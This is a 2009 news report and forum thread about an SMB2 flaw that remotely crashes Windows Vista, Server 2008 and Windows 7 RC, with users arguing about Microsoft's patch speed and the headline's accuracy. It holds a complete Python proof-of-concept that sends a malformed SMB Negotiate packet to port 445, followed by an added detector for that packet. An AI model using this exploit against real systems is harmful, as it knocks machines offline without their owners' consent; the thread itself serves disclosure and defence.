Security experts warned Tuesday that a vulnerability in Microsoft's implementation of the SMB2 protocol can be exploited via the net to crash or reboot Windows Vista and Windows 7 systems. An exploit written in Python is already available and being tested by security experts. Initial tests by heise security indicate the exploit enabled a remote reboot of a Vista system. However, in the test, the exploit had no apparent effect on a computer running Windows 7 RTM.
Microsoft has yet to acknowledge the issue and release an official update. The only current workaround is to close the SMB ports by un-ticking the boxes for file and printer access in the firewall settings.
Update: Microsoft has confirmed that Windows 7 RC is affected by the flaw but Windows 7 RTM is not.
According to the original article, Server 2008 may be vulnerable as well (currently untested), but Win 2000 and XP are not (don't have SMB2).
-------------------------
Vista/Windows 7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server 2008 (not tested) as it uses the same SMB2.0 driver.
http://www.microsoft.com/technet/security/...ory/975497.mspx
Why do you say flaw in Windows 7 then?!
Last edited by Mathiasdm on 08 Sep 2009 - 17:50
However, knowing Microsoft's bug fix response time... it may take a year or two...
However, knowing Microsoft's bug fix response time... it may take a year or two...
LOL what? Microsoft has the fastest critical bug fix time in the industry
Go troll somewhere else
However, knowing Microsoft's bug fix response time... it may take a year or two...
I guess Patch Tuesday just doesn't exist.
However, knowing Microsoft's bug fix response time... it may take a year or two...
ROFLCOPTER
Maybe I was a bit harsh though.
Statistically proven by a company paid for by Microsoft, but don't let that stop you believing in it whole heartedly, and trotting it out whenever you can. Spyglass/IE is the most insecure browser out there, but maybe 8 isn't as bad as the previous versions. They still have a long way to go to even approach some of the security improvements of chrome.
Go troll somewhere else
You would do well heading your own advice:
Sometimes Microsoft are quite good at fixing vulnerabilities, sometimes they are not. Sticking your head in the sand and ignoring the facts doesn't help anyone. Microsoft are a big company, and produce a lot of products, it is not a simple bug fix to fix some of these issues. On top of that, they need loads of testing to make sure they haven't broken anything else.
Except, the office, 360, game studios, hardware, etc teams do not deal with Windows bugs...the Windows team does.
If the bug is deemed critical enough and the patch is released as an emergency patch, then the testing done on is very little. And the patch is released as fast as it possibly can.
So like I said, compared to any other company microsoft's average bug fixing time is the fastest in the industry.
And btw about your little TCP vulnerability post:
A sockstress-style exploit also needs access to raw sockets on the attacking machine because the packets must be handled in userspace rather than with the OS's connect() API. Since raw sockets are disabled on Windows XP SP1 and above, the exploit's usability is limited to those on other platforms with raw sockets such as *nix.
---
Except, IE7/8 on Vista and 7 run by default in protected mode (sandbox). So unless you explicitly allow it, a bug or a virus cannot do any harm to the system. IE7 and 8 already run each tab in a separate process and with DEP enabled (by default) code cannot be injected at all, regardless of where it came from.
Yes I know chrome also has this, but it was done by partially reverse engineering the windows kernel, and IE had it first.
Now if you were to download a virus/trojan w/e and then run it as administrator...you're screwed no matter what browser you use.
Last edited by /- Razorfold on 09 Sep 2009 - 02:45
Last edited by GreyWolfSC on 08 Sep 2009 - 19:09
A mere nuisance? Maybe you think having your computer reboot every 10 minutes is fine?
Hopefully Microsoft will fix this soon, although it has been around for years.
Still needs to be fixed ASAP, and will undoubtedly be patched before 10-22.
Yeah, undoubtedly, even though it has been around for years.
I still don't see Microsoft taking security seriously, when they let stuff like this through.
So, that is your excuse for making stuff up? I didn't say linux, or mac os was perfect, as has been seen by the Mac OS coming with a flawed version of Flash. No OS if perfect, but people running around here, making excuses for Microsoft, talking trash about how they are the fastest at fixing bugs, are making themselves just look silly.
Oh because proof is always silly:
http://arstechnica.com/apple/news/2008/04/...sun-slowest.ars
Done with your trolling yet?
#!/usr/bin/python
# Tested on : Windows Vista SP2 full updated - US-en
#
# When SMB2.0 receives a "&" char in the "Process Id High" header field it
# dies with a PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D
from socket import socket
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
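As an added defender-side example (not from the page or the PoC's author), the following Python 3 code parses the NetBIOS/SMB1 header of a Negotiate request and flags the non-zero Process ID High field that the PoC above relies on, plus a mismatched NetBIOS length; the two sample messages are constructed inline, not captured traffic.

```python
import struct

# Layout of a NetBIOS session message carrying a legacy SMB1 header, which is
# what the Vista/2008 SMB2.0 driver parses during protocol negotiation.
NBT_HDR_LEN = 4            # message type (1 byte) + length (3 bytes, big-endian)
SMB_HDR_LEN = 32
SMB_COM_NEGOTIATE = 0x72   # the command used by the PoC above

def parse_smb_header(data):
    """Return the SMB1 header fields of a NetBIOS session message as a dict,
    or None if the bytes are not a well-formed SMB session message."""
    if len(data) < NBT_HDR_LEN + SMB_HDR_LEN or data[0] != 0x00:
        return None
    smb = data[NBT_HDR_LEN:NBT_HDR_LEN + SMB_HDR_LEN]
    if smb[:4] != b"\xffSMB":
        return None
    names = ("command", "status", "flags", "flags2", "pid_high", "signature",
             "reserved", "tid", "pid_low", "uid", "mid")
    hdr = dict(zip(names, struct.unpack("<BIBHH8sHHHHH", smb[4:])))
    hdr["nbt_len"] = int.from_bytes(data[1:4], "big")   # length the sender claims
    hdr["actual_len"] = len(data) - NBT_HDR_LEN         # length actually present
    return hdr

def inspect_negotiate(data):
    """Flag a Negotiate request whose Process ID High field is non-zero (the
    condition the thread's PoC relies on) or whose NetBIOS length is wrong.
    Returns (suspicious, reasons)."""
    hdr = parse_smb_header(data)
    if hdr is None:
        return False, ["not an SMB session message"]
    reasons = []
    if hdr["command"] == SMB_COM_NEGOTIATE and hdr["pid_high"] != 0:
        reasons.append("negotiate request with non-zero PID high 0x%04x" % hdr["pid_high"])
    if hdr["nbt_len"] != hdr["actual_len"]:
        reasons.append("NetBIOS length %d != payload %d" % (hdr["nbt_len"], hdr["actual_len"]))
    return bool(reasons), reasons

# Constructed sample messages (not captured traffic): a 32-byte Negotiate header
# followed by a minimal body (word count 0, byte count 2, one empty dialect).
_HDR_PREFIX = b"\xffSMB\x72\x00\x00\x00\x00\x18\x53\xc8"   # proto, cmd, status, flags, flags2
_HDR_SUFFIX = b"\x00" * 8 + b"\x00\x00\xff\xff\xff\xfe\x00\x00\x00\x00"  # sig, rsvd, tid, pid_lo, uid, mid
_BODY = b"\x00\x02\x00\x02\x00"
GOOD_NEGOTIATE = b"\x00\x00\x00\x25" + _HDR_PREFIX + b"\x00\x00" + _HDR_SUFFIX + _BODY
BAD_NEGOTIATE = b"\x00\x00\x00\x25" + _HDR_PREFIX + b"\x00\x26" + _HDR_SUFFIX + _BODY

if __name__ == "__main__":
    for label, msg in (("normal", GOOD_NEGOTIATE), ("crafted", BAD_NEGOTIATE)):
        print(label, inspect_negotiate(msg))
```

The same check can be fed the first bytes of any TCP/445 session from a packet capture; only the header is inspected, so the dialect list is irrelevant.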
This could end up being massively exploited. If running the affected version of Windows people should close this port in their firewalls: 445
99% of users don't have SMB mapped through their routers, and when on a public network Vista/7 disables file sharing, so this really isn't that big of an issue.
The last 1% is actually a lot of users as Microsoft has sold 100+ million copies of Vista. Though the actual number of Vista users is unknown, 1% could possibly affect 1 million users. I guess we'll have to wait for Microsoft to respond to this.
They may have "sold" 100 million copies of Vista, but how many people upgraded to XP from that? That is something that Microsoft will never tell us. It could be as high as 90%.
And that's a bad thing because? Stop your trolling, really.
Huh? Okay if you say 90% downgraded to XP that gives it 10 million users still use Vista and 1% of 10 million is what, 100 thousand users? That is still a large amount.
Where'd you pull the number that 90% of Vista users downgrade to XP?
How big is your sample size to come up with that number? What's the average and sigma? What is your data skew? What is the level of confidence in your data? What is the source of your data? How does your data compare with XP when it was released, is there a trend? Can you explain to me what the data tells you after the comparison?
Last edited by kouhii00 on 09 Sep 2009 - 06:17
Where'd you pull the number that 90% of Vista users downgrade to XP?
How big is your sample size to come up with that number? What's the average and sigma? What is your data skew? What is the level of confidence in your data? What is the source of your data? How does your data compare with XP when it was released, is there a trend? Can you explain to me what the data tells you after the comparison?
Can you read? The only people who really know are at Microsoft, and they won't release the numbers. I have no idea what the rate is, but it could be 90%, it could be 1%, it could be anything. But I would guess it is not 1% or Microsoft would be pushing those numbers to any newspaper, tech site, blog or twitter account that they could.
I don't work for Microsoft, despite popular opinion to the contrary.
I don't work for Microsoft, despite popular opinion to the contrary.
Heh.. When you throw out numbers people think you have gotten them from somewhere other than Microsoft. The numbers you have mentioned might be small to you but if you take into consideration the mass amount of Vista/Server 2008 customers the flaw becomes a big issue. If you don't have the actual numbers with the data to back it up please don't randomly assume.
I never said you are a Microsoft employee and of course Microsoft will never release these numbers. If you were the CEO of Microsoft would you? I know I wouldn't, and if some marketing moron releases these numbers without permission from top management he/she will be fired instantly. Good luck getting another job at another high tech company with that kind of record.
If you worked for Microsoft you may be able to answer my questions as these types of information are not accessible to everyone. In the end Microsoft is still selling its OS with margins so it is a win-win situation; why bother?
Haha, I wish; it was a great game.
Oh well, if it doesn't affect the grey wolf then lets forget about it. No point wasting any more time on this guys, lets pack up and go home.
By any chance, do you work for Microsoft in the quality control department?
By any chance, do you work for Microsoft in the quality control department?
"Our investigation has shown that Windows Vista, Windows Server 2008 and Windows 7 RC are affected by this vulnerability. Windows 7 RTM, Windows Server 2008 R2, Windows XP and Windows 2000 are not affected by this vulnerability." - Microsoft Security Response Center
http://blogs.technet.com/msrc/archive/2009...7-released.aspx
Actually, you posted "Microsoft's implementation of the SMB2 protocol can be exploited via the net to crash or reboot Windows Vista and Windows 7 systems." The very next sentence, you say it has no effect on Windows 7. So which is it? And where is this 'could' of which you now speak? Oh, that's right, in the sensationalistic title. Next time, can you toss in a 'Maybe', 'kinda' or 'sorta'? That'd really put it over the top.
Talk about sloppy reporting.
Last edited by Mega Goatlord on 08 Sep 2009 - 20:48
Talk about sloppy reporting.
+1
It is either sloppy reporting or intentional misinformation.
And, yes, I think most of us understand the meaning of COULD. You would use COULD if you had some evidence, which in this case, isn't there. If you wanted to hint at the possibility, you should have used may or might...
Shall we expect to see this sort of sloppy headline till Windows 7 hits the store shelves?
Last edited by zagor on 08 Sep 2009 - 21:52
You're only taking a small part of what he said
The article refers to initial tests only, this doesn't mean that Windows 7 will never be affected in any test/real-world application, this means that under the specific conditions that it tested at Heise Security, Windows 7 was unaffected.
*installs dos*
*adds norton utilities*
*crash*
Your little out-dated XP machine can't do that very well, just keep it in mind.
It shares everything else, except for the GUI, so why wouldn't it? It is version 6.1, not version 7 (how is that for great naming).
Umm no, it has the Windows 7 network stack.
No, it is not. It is version 7, hence being called Windows 7. We changed the GetVersionEx API to return "6.1" for compatibility purposes. This was explained on the E7 blog like a year ago.
So how much has it changed from the one in Vista which it's based upon? You talk as if Windows 7 is a completely new OS. I realize things have been updated and changed, new things introduced, but Windows 7 is still based on Vista. It wasn't written from scratch.
Last edited by Skyfrog on 09 Sep 2009 - 04:37
No OS is written from scratch. Not Ubuntu. Not Linux. Not OSX....
http://blogs.technet.com/msrc/archive/2009...7-released.aspx
---
If that's true then this news needs to be edited.
Before jumping on the train or under the train, better check the validity of the statements.
Before jumping on the train or under the train, better check the validity of the statements.
According to the article and now confirmed by Microsoft, Windows Vista, Windows 7 and Windows Server 2008 are affected by this. Windows 7 RTM isn't affected (this according to Microsoft).
Why is the article published wrong?
Before jumping on the train or under the train, better check the validity of the statements.
According to the article and now confirmed by Microsoft, Windows Vista, Windows 7 and Windows Server 2008 are affected by this. Windows 7 RTM isn't affected (this according to Microsoft).
Why is the article published wrong?
Well, I think people will see what they want to see. Didn't you read the article that you mentioned? It says Windows 7 RTM is not affected.
Windows 7 RC is affected. But, that's not the same thing as Windows 7 being affected. Windows 7 RC is a beta product.
Thanks Tom for your irresponsible reporting, straight from the horse's mouth.
Edit: Just so it's final on this board
Our investigation has shown that Windows Vista, Windows Server 2008 and Windows 7 RC are affected by this vulnerability. Windows 7 RTM, Windows Server 2008 R2, Windows XP and Windows 2000 are not affected by this vulnerability.
"Flaw in Windows Vista allows remote reboot; Windows 7 not affected"